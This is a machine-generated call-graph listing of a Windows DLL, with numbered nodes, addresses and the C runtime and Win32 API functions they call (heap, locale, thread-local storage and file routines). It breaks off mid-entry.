6567->6590 6570->6549 6572 10002c40 ___scrt_fastfail 6571->6572 6573 10001ea7 lstrcatW lstrlenW 6572->6573 6574 10001ed1 lstrcatW 6573->6574 6575 10001ec2 6573->6575 6574->6563 6575->6574 6576 10001ec7 lstrlenW 6575->6576 6576->6574 6578 10001747 ___scrt_fastfail 6577->6578 6605 10001cca 6578->6605 6581 1000199f 6581->6570 6583 10001824 ___scrt_fastfail _strlen 6583->6581 6623 100015da 6583->6623 6586 10001e29 6585->6586 6589 10001e4c 6585->6589 6587 10001e2d lstrlenW 6586->6587 6586->6589 6588 10001e3f lstrlenW 6587->6588 6587->6589 6588->6589 6589->6564 6591 1000120e ___scrt_fastfail 6590->6591 6592 10001e89 5 API calls 6591->6592 6593 10001220 GetFileAttributesW 6592->6593 6594 10001235 6593->6594 6595 10001246 6593->6595 6594->6595 6597 1000173a 29 API calls 6594->6597 6596 10001e89 5 API calls 6595->6596 6598 10001258 6596->6598 6597->6595 6599 100010f1 50 API calls 6598->6599 6600 1000126d 6599->6600 6601 10001e89 5 API calls 6600->6601 6602 1000127f ___scrt_fastfail 6601->6602 6603 100010f1 50 API calls 6602->6603 6604 100012e6 6603->6604 6604->6570 6606 10001cf1 ___scrt_fastfail 6605->6606 6607 10001d55 GetFileSize 6606->6607 6612 10001808 6606->6612 6608 10001ede 21 API calls 6607->6608 6609 10001d66 ReadFile 6608->6609 6610 10001d94 CloseHandle 6609->6610 6611 10001d7d CloseHandle 6609->6611 6610->6612 6611->6612 6612->6581 6613 10001ede 6612->6613 6615 1000222f 6613->6615 6616 1000224e 6615->6616 6617 1000474f __dosmaperr 7 API calls 6615->6617 6618 10002250 6615->6618 6631 100047e5 6615->6631 6616->6583 6617->6615 6619 10002908 6618->6619 6638 100035d2 6618->6638 6620 100035d2 __CxxThrowException@8 RaiseException 6619->6620 6622 10002925 6620->6622 6622->6583 6624 1000160c _strcat _strlen 6623->6624 6625 1000163c lstrlenW 6624->6625 6641 10001c9d 6625->6641 6627 10001655 lstrcatW lstrlenW 6628 10001678 6627->6628 6629 10001693 ___scrt_fastfail 6628->6629 6630 1000167e lstrcatW 6628->6630 6629->6583 6630->6629 6636 100056d0 __dosmaperr 6631->6636 6632 1000570e 6633 10006368 __dosmaperr 19 API calls 6632->6633 6635 1000570c 6633->6635 6634 100056f9 RtlAllocateHeap 6634->6635 6634->6636 6635->6615 6636->6632 6636->6634 6637 1000474f __dosmaperr 7 API calls 6636->6637 6637->6636 6640 100035f2 RaiseException 6638->6640 6640->6619 6642 10001ca6 _strlen 6641->6642 6642->6627 6643 100020db 6644 100020e7 ___scrt_is_nonwritable_in_current_image 6643->6644 6645 10002110 dllmain_raw 6644->6645 6649 1000210b 6644->6649 6654 100020f6 6644->6654 6646 1000212a 6645->6646 6645->6654 6656 10001eec 6646->6656 6648 10002177 6650 10001eec 29 API calls 6648->6650 6648->6654 6649->6648 6652 10001eec 29 API calls 6649->6652 6649->6654 6651 1000218a 6650->6651 6653 10002193 dllmain_raw 6651->6653 6651->6654 6655 1000216d dllmain_raw 6652->6655 6653->6654 6655->6648 6657 10001ef7 6656->6657 6658 10001f2a dllmain_crt_process_detach 6656->6658 6659 10001f1c dllmain_crt_process_attach 6657->6659 6660 10001efc 6657->6660 6665 10001f06 6658->6665 6659->6665 6661 10001f01 6660->6661 6662 10001f12 6660->6662 6661->6665 6666 1000240b 6661->6666 6671 100023ec 6662->6671 6665->6649 6679 100053e5 6666->6679 6784 10003513 6671->6784 6674 100023f5 6674->6665 6677 10002408 6677->6665 6678 1000351e 6 API calls 6678->6674 6685 10005aca 6679->6685 6682 1000351e 6757 10003820 6682->6757 6684 10002415 6684->6665 6686 10005ad4 6685->6686 6689 10002410 6685->6689 6687 10005e08 __dosmaperr 10 API calls 6686->6687 6688 10005adb 6687->6688 6688->6689 6690 10005e5e __dosmaperr 10 API calls 6688->6690 6689->6682 6691 10005aee 6690->6691 6693 100059b5 6691->6693 6694 100059c0 6693->6694 6695 100059d0 6693->6695 6699 100059d6 6694->6699 6695->6689 6698 1000571e _free 19 API calls 6698->6695 6700 100059ef 6699->6700 6701 100059e9 6699->6701 6703 1000571e _free 19 API calls 6700->6703 6702 1000571e _free 19 API calls 6701->6702 6702->6700 6704 100059fb 6703->6704 6705 1000571e _free 19 API calls 6704->6705 6706 10005a06 6705->6706 6707 1000571e _free 19 API calls 6706->6707 6708 10005a11 6707->6708 6709 1000571e _free 19 API calls 6708->6709 6710 10005a1c 6709->6710 6711 1000571e _free 19 API calls 6710->6711 6712 10005a27 6711->6712 6713 1000571e _free 19 API calls 6712->6713 6714 10005a32 6713->6714 6715 1000571e _free 19 API calls 6714->6715 6716 10005a3d 6715->6716 6717 1000571e _free 19 API calls 6716->6717 6718 10005a48 6717->6718 6719 1000571e _free 19 API calls 6718->6719 6720 10005a56 6719->6720 6725 1000589c 6720->6725 6731 100057a8 6725->6731 6727 100058c0 6728 100058ec 6727->6728 6744 10005809 6728->6744 6730 10005910 6730->6698 6732 100057b4 ___scrt_is_nonwritable_in_current_image 6731->6732 6739 10005671 RtlEnterCriticalSection 6732->6739 6734 100057e8 6740 100057fd 6734->6740 6736 100057be 6736->6734 6738 1000571e _free 19 API calls 6736->6738 6737 100057f5 _abort 6737->6727 6738->6734 6739->6736 6743 100056b9 RtlLeaveCriticalSection 6740->6743 6742 10005807 6742->6737 6743->6742 6745 10005815 ___scrt_is_nonwritable_in_current_image 6744->6745 6752 10005671 RtlEnterCriticalSection 6745->6752 6747 1000581f 6748 10005a7f __dosmaperr 19 API calls 6747->6748 6749 10005832 6748->6749 6753 10005848 6749->6753 6751 10005840 _abort 6751->6730 6752->6747 6756 100056b9 RtlLeaveCriticalSection 6753->6756 6755 10005852 6755->6751 6756->6755 6758 1000382d 6757->6758 6762 1000384b ___vcrt_freefls@4 6757->6762 6759 1000383b 6758->6759 6763 10003b67 6758->6763 6768 10003ba2 6759->6768 6762->6684 6773 10003a82 6763->6773 6765 10003b81 6766 10003b99 TlsGetValue 6765->6766 6767 10003b8d 6765->6767 6766->6767 6767->6759 6769 10003a82 try_get_function 4 API calls 6768->6769 6770 10003bbc 6769->6770 6771 10003bd7 TlsSetValue 6770->6771 6772 10003bcb 6770->6772 6771->6772 6772->6762 6774 10003aaa 6773->6774 6776 10003aa6 __crt_fast_encode_pointer 6773->6776 6774->6776 6777 100039be 6774->6777 6776->6765 6782 100039cd try_get_first_available_module 6777->6782 6778 10003a77 6778->6776 6779 100039ea LoadLibraryExW 6780 10003a05 GetLastError 6779->6780 6779->6782 6780->6782 6781 10003a60 FreeLibrary 6781->6782 6782->6778 6782->6779 6782->6781 6783 10003a38 LoadLibraryExW 6782->6783 6783->6782 6790 10003856 6784->6790 6786 100023f1 6786->6674 6787 100053da 6786->6787 6788 10005b7a __dosmaperr 19 API calls 6787->6788 6789 100023fd 6788->6789 6789->6677 6789->6678 6791 10003862 GetLastError 6790->6791 6792 1000385f 6790->6792 6793 10003b67 ___vcrt_FlsGetValue 5 API calls 6791->6793 6792->6786 6794 10003877 6793->6794 6795 100038dc SetLastError 6794->6795 6796 10003ba2 ___vcrt_FlsSetValue 5 API calls 6794->6796 6801 10003896 6794->6801 6795->6786 6797 10003890 6796->6797 6798 100038b8 6797->6798 6799 10003ba2 ___vcrt_FlsSetValue 5 API calls 6797->6799 6797->6801 6800 10003ba2 ___vcrt_FlsSetValue 5 API calls 6798->6800 6798->6801 6799->6798 6800->6801 6801->6795 6992 1000281c 6995 10002882 6992->6995 6998 10003550 6995->6998 6997 1000282a 6999 1000355d 6998->6999 7002 1000358a 6998->7002 7000 100047e5 ___std_exception_copy 20 API calls 6999->7000 6999->7002 7001 1000357a 7000->7001 7001->7002 7004 1000544d 7001->7004 7002->6997 7005 1000545a 7004->7005 7006 10005468 7004->7006 7005->7006 7011 1000547f 7005->7011 7007 10006368 __dosmaperr 19 API calls 7006->7007 7008 10005470 7007->7008 7009 100062ac ___std_exception_copy 25 API calls 7008->7009 7010 1000547a 7009->7010 7010->7002 7011->7010 7012 10006368 __dosmaperr 19 API calls 7011->7012 7012->7008 7808 10004bdd 7809 10004c08 7808->7809 7810 10004bec 7808->7810 7812 10006d60 49 API calls 7809->7812 7810->7809 7811 10004bf2 7810->7811 7814 10006368 __dosmaperr 19 API calls 7811->7814 7813 10004c0f GetModuleFileNameA 7812->7813 7815 10004c33 7813->7815 7816 10004bf7 7814->7816 7831 10004d01 7815->7831 7817 100062ac ___std_exception_copy 25 API calls 7816->7817 7819 10004c01 7817->7819 7823 10004c72 7826 10004d01 36 API calls 7823->7826 7824 10004c66 7825 10006368 __dosmaperr 19 API calls 7824->7825 7830 10004c6b 7825->7830 7827 10004c88 7826->7827 7829 1000571e _free 19 API calls 7827->7829 7827->7830 7828 1000571e _free 19 API calls 7828->7819 7829->7830 7830->7828 7833 10004d26 7831->7833 7835 10004d86 7833->7835 7843 100070eb 7833->7843 7834 10004c50 7837 10004e76 7834->7837 7835->7834 7836 100070eb 36 API calls 7835->7836 7836->7835 7838 10004c5d 7837->7838 7839 10004e8b 7837->7839 7838->7823 7838->7824 7839->7838 7840 1000637b __dosmaperr 19 API calls 7839->7840 7841 10004eb9 7840->7841 7842 1000571e _free 19 API calls 7841->7842 7842->7838 7846 10007092 7843->7846 7847 100054a7 __fassign 36 API calls 7846->7847 7848 100070a6 7847->7848 7848->7833 5840 10006d60 5841 10006d69 5840->5841 5842 10006d72 5840->5842 5844 10006c5f 5841->5844 5864 10005af6 GetLastError 5844->5864 5846 10006c6c 5884 10006d7e 5846->5884 5848 10006c74 5893 100069f3 5848->5893 5851 10006c8b 5851->5842 5854 10006cce 5920 1000571e 5854->5920 5858 10006cc9 5917 10006368 5858->5917 5860 10006d12 5860->5854 5926 100068c9 5860->5926 5861 10006ce6 5861->5860 5862 1000571e _free 19 API calls 5861->5862 5862->5860 5865 10005b12 5864->5865 5866 10005b0c 5864->5866 5870 10005b61 SetLastError 5865->5870 5936 1000637b 5865->5936 5929 10005e08 5866->5929 5870->5846 5871 10005b2c 5873 1000571e _free 19 API calls 5871->5873 5875 10005b32 5873->5875 5877 10005b6d SetLastError 5875->5877 5876 10005b48 5950 1000593c 5876->5950 5955 100055a8 5877->5955 5881 1000571e _free 19 API calls 5883 10005b5a 5881->5883 5883->5870 5883->5877 5885 10006d8a ___scrt_is_nonwritable_in_current_image 5884->5885 5886 10005af6 _abort 36 API calls 5885->5886 5888 10006d94 5886->5888 5889 10006e18 _abort 5888->5889 5890 100055a8 _abort 36 API calls 5888->5890 5892 1000571e _free 19 API calls 5888->5892 6330 10005671 RtlEnterCriticalSection 5888->6330 6331 10006e0f 5888->6331 5889->5848 5890->5888 5892->5888 6335 100054a7 5893->6335 5896 10006a14 GetOEMCP 5898 10006a3d 5896->5898 5897 10006a26 5897->5898 5899 10006a2b GetACP 5897->5899 5898->5851 5900 100056d0 5898->5900 5899->5898 5901 1000570e 5900->5901 5906 100056de __dosmaperr 5900->5906 5902 10006368 __dosmaperr 19 API calls 5901->5902 5904 1000570c 5902->5904 5903 100056f9 RtlAllocateHeap 5903->5904 5903->5906 5904->5854 5907 10006e20 5904->5907 5905 1000474f __dosmaperr 7 API calls 5905->5906 5906->5901 5906->5903 5906->5905 5908 100069f3 38 API calls 5907->5908 5909 10006e3f 5908->5909 5912 10006e90 IsValidCodePage 5909->5912 5914 10006e46 5909->5914 5916 10006eb5 ___scrt_fastfail 5909->5916 5910 10002ada _ValidateLocalCookies 5 API calls 5911 10006cc1 5910->5911 5911->5858 5911->5861 5913 10006ea2 GetCPInfo 5912->5913 5912->5914 5913->5914 5913->5916 5914->5910 6372 10006acb GetCPInfo 5916->6372 5918 10005b7a __dosmaperr 19 API calls 5917->5918 5919 1000636d 5918->5919 5919->5854 5921 10005752 __dosmaperr 5920->5921 5922 10005729 HeapFree 5920->5922 5921->5851 5922->5921 5923 1000573e 5922->5923 5924 10006368 __dosmaperr 17 API calls 5923->5924 5925 10005744 GetLastError 5924->5925 5925->5921 6445 10006886 5926->6445 5928 100068ed 5928->5854 5966 10005c45 5929->5966 5931 10005e2f 5932 10005e47 TlsGetValue 5931->5932 5935 10005e3b 5931->5935 5932->5935 5934 10005e58 5934->5865 5970 10002ada 5935->5970 5937 10006388 __dosmaperr 5936->5937 5938 100063c8 5937->5938 5939 100063b3 RtlAllocateHeap 5937->5939 5985 1000474f 5937->5985 5940 10006368 __dosmaperr 18 API calls 5938->5940 5939->5937 5941 10005b24 5939->5941 5940->5941 5941->5871 5943 10005e5e 5941->5943 5944 10005c45 __dosmaperr 4 API calls 5943->5944 5945 10005e85 5944->5945 5946 10005ea0 TlsSetValue 5945->5946 5947 10005e94 5945->5947 5946->5947 5948 10002ada _ValidateLocalCookies 5 API calls 5947->5948 5949 10005b41 5948->5949 5949->5871 5949->5876 6001 10005914 5950->6001 6149 10007613 5955->6149 5958 100055b8 5960 100055c2 IsProcessorFeaturePresent 5958->5960 5961 100055e0 5958->5961 5963 100055cd 5960->5963 6185 10004bc1 5961->6185 6179 100060e2 5963->6179 5968 10005c71 5966->5968 5969 10005c75 __crt_fast_encode_pointer 5966->5969 5968->5969 5977 10005ce1 5968->5977 5969->5931 5971 10002ae3 5970->5971 5972 10002ae5 IsProcessorFeaturePresent 5970->5972 5971->5934 5974 10002b58 5972->5974 5984 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5974->5984 5976 10002c3b 5976->5934 5978 10005d02 LoadLibraryExW 5977->5978 5983 10005cf7 5977->5983 5979 10005d1f GetLastError 5978->5979 5982 10005d37 5978->5982 5980 10005d2a LoadLibraryExW 5979->5980 5979->5982 5980->5982 5981 10005d4e FreeLibrary 5981->5983 5982->5981 5982->5983 5983->5968 5984->5976 5990 10004793 5985->5990 5987 10002ada _ValidateLocalCookies 5 API calls 5988 1000478f 5987->5988 5988->5937 5989 10004765 5989->5987 5991 1000479f ___scrt_is_nonwritable_in_current_image 5990->5991 5996 10005671 RtlEnterCriticalSection 5991->5996 5993 100047aa 5997 100047dc 5993->5997 5995 100047d1 _abort 5995->5989 5996->5993 6000 100056b9 RtlLeaveCriticalSection 5997->6000 5999 100047e3 5999->5995 6000->5999 6007 10005854 6001->6007 6003 10005938 6004 100058c4 6003->6004 6018 10005758 6004->6018 6006 100058e8 6006->5881 6008 10005860 ___scrt_is_nonwritable_in_current_image 6007->6008 6013 10005671 RtlEnterCriticalSection 6008->6013 6010 1000586a 6014 10005890 6010->6014 6012 10005888 _abort 6012->6003 6013->6010 6017 100056b9 RtlLeaveCriticalSection 6014->6017 6016 1000589a 6016->6012 6017->6016 6019 10005764 ___scrt_is_nonwritable_in_current_image 6018->6019 6026 10005671 RtlEnterCriticalSection 6019->6026 6021 1000576e 6027 10005a7f 6021->6027 6023 10005786 6031 1000579c 6023->6031 6025 10005794 _abort 6025->6006 6026->6021 6028 10005a8e __fassign 6027->6028 6029 10005ab5 __fassign 6027->6029 6028->6029 6034 10007cc2 6028->6034 6029->6023 6148 100056b9 RtlLeaveCriticalSection 6031->6148 6033 100057a6 6033->6025 6035 10007d42 6034->6035 6039 10007cd8 6034->6039 6036 10007d90 6035->6036 6038 1000571e _free 19 API calls 6035->6038 6102 10007e35 6036->6102 6040 10007d64 6038->6040 6039->6035 6041 10007d0b 6039->6041 6046 1000571e _free 19 API calls 6039->6046 6042 1000571e _free 19 API calls 6040->6042 6043 10007d2d 6041->6043 6048 1000571e _free 19 API calls 6041->6048 6044 10007d77 6042->6044 6045 1000571e _free 19 API calls 6043->6045 6047 1000571e _free 19 API calls 6044->6047 6049 10007d37 6045->6049 6051 10007d00 6046->6051 6054 10007d85 6047->6054 6055 10007d22 6048->6055 6056 1000571e _free 19 API calls 6049->6056 6050 10007dfe 6057 1000571e _free 19 API calls 6050->6057 6062 100090ba 6051->6062 6052 10007d9e 6052->6050 6060 1000571e 19 API calls _free 6052->6060 6058 1000571e _free 19 API calls 6054->6058 6090 100091b8 6055->6090 6056->6035 6061 10007e04 6057->6061 6058->6036 6060->6052 6061->6029 6063 100090cb 6062->6063 6089 100091b4 6062->6089 6064 100090dc 6063->6064 6066 1000571e _free 19 API calls 6063->6066 6065 100090ee 6064->6065 6067 1000571e _free 19 API calls 6064->6067 6068 10009100 6065->6068 6069 1000571e _free 19 API calls 6065->6069 6066->6064 6067->6065 6070 10009112 6068->6070 6071 1000571e _free 19 API calls 6068->6071 6069->6068 6072 10009124 6070->6072 6074 1000571e _free 19 API calls 6070->6074 6071->6070 6073 10009136 6072->6073 6075 1000571e _free 19 API calls 6072->6075 6076 10009148 6073->6076 6077 1000571e _free 19 API calls 6073->6077 6074->6072 6075->6073 6078 1000571e _free 19 API calls 6076->6078 6081 1000915a 6076->6081 6077->6076 6078->6081 6079 1000916c 6080 1000917e 6079->6080 6083 1000571e _free 19 API calls 6079->6083 6084 10009190 6080->6084 6085 1000571e _free 19 API calls 6080->6085 6081->6079 6082 1000571e _free 19 API calls 6081->6082 6082->6079 6083->6080 6086 100091a2 6084->6086 6087 1000571e _free 19 API calls 6084->6087 6085->6084 6088 1000571e _free 19 API calls 6086->6088 6086->6089 6087->6086 6088->6089 6089->6041 6091 100091c5 6090->6091 6092 1000921d 6090->6092 6093 100091d5 6091->6093 6094 1000571e _free 19 API calls 6091->6094 6092->6043 6095 100091e7 6093->6095 6096 1000571e _free 19 API calls 6093->6096 6094->6093 6097 100091f9 6095->6097 6098 1000571e _free 19 API calls 6095->6098 6096->6095 6099 1000920b 6097->6099 6100 1000571e _free 19 API calls 6097->6100 6098->6097 6099->6092 6101 1000571e _free 19 API calls 6099->6101 6100->6099 6101->6092 6103 10007e60 6102->6103 6104 10007e42 6102->6104 6103->6052 6104->6103 6108 1000925d 6104->6108 6107 1000571e _free 19 API calls 6107->6103 6109 1000926e 6108->6109 6143 10007e5a 6108->6143 6144 10009221 6109->6144 6112 10009221 __fassign 19 API calls 6113 10009281 6112->6113 6114 10009221 __fassign 19 API calls 6113->6114 6115 1000928c 6114->6115 6116 10009221 __fassign 19 API calls 6115->6116 6117 10009297 6116->6117 6118 10009221 __fassign 19 API calls 6117->6118 6119 100092a5 6118->6119 6120 1000571e _free 19 API calls 6119->6120 6121 100092b0 6120->6121 6122 1000571e _free 19 API calls 6121->6122 6123 100092bb 6122->6123 6124 1000571e _free 19 API calls 6123->6124 6125 100092c6 6124->6125 6126 10009221 __fassign 19 API calls 6125->6126 6127 100092d4 6126->6127 6128 10009221 __fassign 19 API calls 6127->6128 6129 100092e2 6128->6129 6130 10009221 __fassign 19 API calls 6129->6130 6131 100092f3 6130->6131 6132 10009221 __fassign 19 API calls 6131->6132 6133 10009301 6132->6133 6134 10009221 __fassign 19 API calls 6133->6134 6135 1000930f 6134->6135 6136 1000571e _free 19 API calls 6135->6136 6137 1000931a 6136->6137 6138 1000571e _free 19 API calls 6137->6138 6139 10009325 6138->6139 6140 1000571e _free 19 API calls 6139->6140 6141 10009330 6140->6141 6142 1000571e _free 19 API calls 6141->6142 6142->6143 6143->6107 6145 10009258 6144->6145 6147 10009248 6144->6147 6145->6112 6146 1000571e _free 19 API calls 6146->6147 6147->6145 6147->6146 6148->6033 6188 10007581 6149->6188 6152 1000766e 6153 1000767a _abort 6152->6153 6154 100076a1 _abort 6153->6154 6159 100076a7 _abort 6153->6159 6202 10005b7a GetLastError 6153->6202 6156 100076f3 6154->6156 6154->6159 6160 100076d6 6154->6160 6157 10006368 __dosmaperr 19 API calls 6156->6157 6158 100076f8 6157->6158 6221 100062ac 6158->6221 6165 1000771f 6159->6165 6224 10005671 RtlEnterCriticalSection 6159->6224 6233 1000bdc9 6160->6233 6167 1000777e 6165->6167 6169 10007776 6165->6169 6176 100077a9 6165->6176 6225 100056b9 RtlLeaveCriticalSection 6165->6225 6167->6176 6226 10007665 6167->6226 6170 10004bc1 _abort 26 API calls 6169->6170 6170->6167 6173 10005af6 _abort 36 API calls 6177 1000780c 6173->6177 6175 10007665 _abort 36 API calls 6175->6176 6229 1000782e 6176->6229 6177->6160 6178 10005af6 _abort 36 API calls 6177->6178 6178->6160 6180 100060fe ___scrt_fastfail 6179->6180 6181 1000612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6180->6181 6183 100061fb ___scrt_fastfail 6181->6183 6182 10002ada _ValidateLocalCookies 5 API calls 6184 10006219 6182->6184 6183->6182 6184->5961 6252 1000499b 6185->6252 6191 10007527 6188->6191 6190 100055ad 6190->5958 6190->6152 6192 10007533 ___scrt_is_nonwritable_in_current_image 6191->6192 6197 10005671 RtlEnterCriticalSection 6192->6197 6194 10007541 6198 10007575 6194->6198 6196 10007568 _abort 6196->6190 6197->6194 6201 100056b9 RtlLeaveCriticalSection 6198->6201 6200 1000757f 6200->6196 6201->6200 6203 10005b93 6202->6203 6204 10005b99 6202->6204 6206 10005e08 __dosmaperr 10 API calls 6203->6206 6205 1000637b __dosmaperr 16 API calls 6204->6205 6208 10005bf0 SetLastError 6204->6208 6207 10005bab 6205->6207 6206->6204 6209 10005bb3 6207->6209 6211 10005e5e __dosmaperr 10 API calls 6207->6211 6210 10005bf9 6208->6210 6212 1000571e _free 16 API calls 6209->6212 6210->6154 6213 10005bc8 6211->6213 6214 10005bb9 6212->6214 6213->6209 6215 10005bcf 6213->6215 6216 10005be7 SetLastError 6214->6216 6217 1000593c __dosmaperr 16 API calls 6215->6217 6216->6210 6218 10005bda 6217->6218 6219 1000571e _free 16 API calls 6218->6219 6220 10005be0 6219->6220 6220->6208 6220->6216 6236 10006231 6221->6236 6223 100062b8 6223->6160 6224->6165 6225->6169 6227 10005af6 _abort 36 API calls 6226->6227 6228 1000766a 6227->6228 6228->6175 6230 10007834 6229->6230 6231 100077fd 6229->6231 6251 100056b9 RtlLeaveCriticalSection 6230->6251 6231->6160 6231->6173 6231->6177 6234 10002ada _ValidateLocalCookies 5 API calls 6233->6234 6235 1000bdd4 6234->6235 6235->6235 6237 10005b7a __dosmaperr 19 API calls 6236->6237 6238 10006247 6237->6238 6239 100062a6 6238->6239 6242 10006255 6238->6242 6247 100062bc IsProcessorFeaturePresent 6239->6247 6241 100062ab 6243 10006231 ___std_exception_copy 25 API calls 6241->6243 6245 10002ada _ValidateLocalCookies 5 API calls 6242->6245 6244 100062b8 6243->6244 6244->6223 6246 1000627c 6245->6246 6246->6223 6248 100062c7 6247->6248 6249 100060e2 _abort 8 API calls 6248->6249 6250 100062dc GetCurrentProcess TerminateProcess 6249->6250 6250->6241 6251->6231 6253 100049a7 _abort 6252->6253 6254 100049bf 6253->6254 6274 10004af5 GetModuleHandleW 6253->6274 6282 10005671 RtlEnterCriticalSection 6254->6282 6258 10004a65 6290 10004aa5 6258->6290 6262 10004a3c 6263 10004a54 6262->6263 6286 10004669 6262->6286 6270 10004669 _abort 5 API calls 6263->6270 6264 100049c7 6264->6258 6264->6262 6283 1000527a 6264->6283 6265 10004a82 6293 10004ab4 6265->6293 6266 10004aae 6268 1000bdc9 _abort 5 API calls 6266->6268 6272 10004ab3 6268->6272 6270->6258 6275 100049b3 6274->6275 6275->6254 6276 10004b39 GetModuleHandleExW 6275->6276 6281 10004b63 6276->6281 6277 10004b95 6279 10002ada _ValidateLocalCookies 5 API calls 6277->6279 6278 10004b8c FreeLibrary 6278->6277 6280 10004b9f 6279->6280 6280->6254 6281->6277 6281->6278 6282->6264 6301 10005132 6283->6301 6288 10004698 6286->6288 6287 10002ada _ValidateLocalCookies 5 API calls 6289 100046c1 6287->6289 6288->6287 6289->6263 6323 100056b9 RtlLeaveCriticalSection 6290->6323 6292 10004a7e 6292->6265 6292->6266 6324 10006025 6293->6324 6296 10004ae2 6298 10004b39 _abort 7 API calls 6296->6298 6297 10004ac2 GetPEB 6297->6296 6299 10004ad2 GetCurrentProcess TerminateProcess 6297->6299 6300 10004aea ExitProcess 6298->6300 6299->6296 6304 100050e1 6301->6304 6303 10005156 6303->6262 6305 100050ed ___scrt_is_nonwritable_in_current_image 6304->6305 6312 10005671 RtlEnterCriticalSection 6305->6312 6307 100050fb 6313 1000515a 6307->6313 6311 10005119 _abort 6311->6303 6312->6307 6316 10005182 6313->6316 6317 1000517a 6313->6317 6314 10002ada _ValidateLocalCookies 5 API calls 6315 10005108 6314->6315 6319 10005126 6315->6319 6316->6317 6318 1000571e _free 19 API calls 6316->6318 6317->6314 6318->6317 6322 100056b9 RtlLeaveCriticalSection 6319->6322 6321 10005130 6321->6311 6322->6321 6323->6292 6325 1000604a 6324->6325 6329 10006040 6324->6329 6326 10005c45 __dosmaperr 4 API calls 6325->6326 6326->6329 6327 10002ada _ValidateLocalCookies 5 API calls 6328 10004abe 6327->6328 6328->6296 6328->6297 6329->6327 6330->5888 6334 100056b9 RtlLeaveCriticalSection 6331->6334 6333 10006e16 6333->5888 6334->6333 6336 100054c4 6335->6336 6342 100054ba 6335->6342 6337 10005af6 _abort 36 API calls 6336->6337 6336->6342 6338 100054e5 6337->6338 6343 10007a00 6338->6343 6342->5896 6342->5897 6344 10007a13 6343->6344 6346 100054fe 6343->6346 6344->6346 6351 10007f0f 6344->6351 6347 10007a2d 6346->6347 6348 10007a40 6347->6348 6350 10007a55 6347->6350 6349 10006d7e __fassign 36 API calls 6348->6349 6348->6350 6349->6350 6350->6342 6352 10007f1b ___scrt_is_nonwritable_in_current_image 6351->6352 6353 10005af6 _abort 36 API calls 6352->6353 6354 10007f24 6353->6354 6357 10007f72 _abort 6354->6357 6363 10005671 RtlEnterCriticalSection 6354->6363 6356 10007f42 6364 10007f86 6356->6364 6357->6346 6362 100055a8 _abort 36 API calls 6362->6357 6363->6356 6365 10007f94 __fassign 6364->6365 6367 10007f56 6364->6367 6366 10007cc2 __fassign 19 API calls 6365->6366 6365->6367 6366->6367 6368 10007f75 6367->6368 6371 100056b9 RtlLeaveCriticalSection 6368->6371 6370 10007f69 6370->6357 6370->6362 6371->6370 6377 10006b05 6372->6377 6381 10006baf 6372->6381 6374 10002ada _ValidateLocalCookies 5 API calls 6376 10006c5b 6374->6376 6376->5914 6382 100086e4 6377->6382 6380 10008a3e 41 API calls 6380->6381 6381->6374 6383 100054a7 __fassign 36 API calls 6382->6383 6384 10008704 MultiByteToWideChar 6383->6384 6386 10008742 6384->6386 6387 100087da 6384->6387 6389 100056d0 20 API calls 6386->6389 6392 10008763 ___scrt_fastfail 6386->6392 6388 10002ada _ValidateLocalCookies 5 API calls 6387->6388 6390 10006b66 6388->6390 6389->6392 6396 10008a3e 6390->6396 6391 100087d4 6401 10008801 6391->6401 6392->6391 6394 100087a8 MultiByteToWideChar 6392->6394 6394->6391 6395 100087c4 GetStringTypeW 6394->6395 6395->6391 6397 100054a7 __fassign 36 API calls 6396->6397 6398 10008a51 6397->6398 6405 10008821 6398->6405 6402 1000880d 6401->6402 6403 1000881e 6401->6403 6402->6403 6404 1000571e _free 19 API calls 6402->6404 6403->6387 6404->6403 6406 1000883c 6405->6406 6407 10008862 MultiByteToWideChar 6406->6407 6408 10008a16 6407->6408 6409 1000888c 6407->6409 6410 10002ada _ValidateLocalCookies 5 API calls 6408->6410 6414 100056d0 20 API calls 6409->6414 6416 100088ad 6409->6416 6411 10006b87 6410->6411 6411->6380 6412 100088f6 MultiByteToWideChar 6413 10008962 6412->6413 6415 1000890f 6412->6415 6418 10008801 __freea 19 API calls 6413->6418 6414->6416 6432 10005f19 6415->6432 6416->6412 6416->6413 6418->6408 6420 10008971 6422 100056d0 20 API calls 6420->6422 6426 10008992 6420->6426 6421 10008939 6421->6413 6423 10005f19 10 API calls 6421->6423 6422->6426 6423->6413 6424 10008a07 6425 10008801 __freea 19 API calls 6424->6425 6425->6413 6426->6424 6427 10005f19 10 API calls 6426->6427 6428 100089e6 6427->6428 6428->6424 6429 100089f5 WideCharToMultiByte 6428->6429 6429->6424 6430 10008a35 6429->6430 6431 10008801 __freea 19 API calls 6430->6431 6431->6413 6433 10005c45 __dosmaperr 4 API calls 6432->6433 6434 10005f40 6433->6434 6437 10005f49 6434->6437 6440 10005fa1 6434->6440 6438 10002ada _ValidateLocalCookies 5 API calls 6437->6438 6439 10005f9b 6438->6439 6439->6413 6439->6420 6439->6421 6441 10005c45 __dosmaperr 4 API calls 6440->6441 6442 10005fc8 6441->6442 6443 10002ada _ValidateLocalCookies 5 API calls 6442->6443 6444 10005f89 LCMapStringW 6443->6444 6444->6437 6446 10006892 ___scrt_is_nonwritable_in_current_image 6445->6446 6453 10005671 RtlEnterCriticalSection 6446->6453 6448 1000689c 6454 100068f1 6448->6454 6452 100068b5 _abort 6452->5928 6453->6448 6466 10007011 6454->6466 6456 1000693f 6457 10007011 25 API calls 6456->6457 6458 1000695b 6457->6458 6459 10007011 25 API calls 6458->6459 6460 10006979 6459->6460 6461 100068a9 6460->6461 6462 1000571e _free 19 API calls 6460->6462 6463 100068bd 6461->6463 6462->6461 6480 100056b9 RtlLeaveCriticalSection 6463->6480 6465 100068c7 6465->6452 6467 10007022 6466->6467 6475 1000701e 6466->6475 6468 10007029 6467->6468 6472 1000703c ___scrt_fastfail 6467->6472 6469 10006368 __dosmaperr 19 API calls 6468->6469 6470 1000702e 6469->6470 6471 100062ac ___std_exception_copy 25 API calls 6470->6471 6471->6475 6473 10007073 6472->6473 6474 1000706a 6472->6474 6472->6475 6473->6475 6477 10006368 __dosmaperr 19 API calls 6473->6477 6476 10006368 __dosmaperr 19 API calls 6474->6476 6475->6456 6478 1000706f 6476->6478 6477->6478 6479 100062ac ___std_exception_copy 25 API calls 6478->6479 6479->6475 6480->6465 7510 10007260 GetStartupInfoW 7511 10007286 7510->7511 7512 10007318 7510->7512 7511->7512 7516 10008be3 7511->7516 7514 100072dd GetFileType 7515 100072af 7514->7515 7515->7512 7515->7514 7517 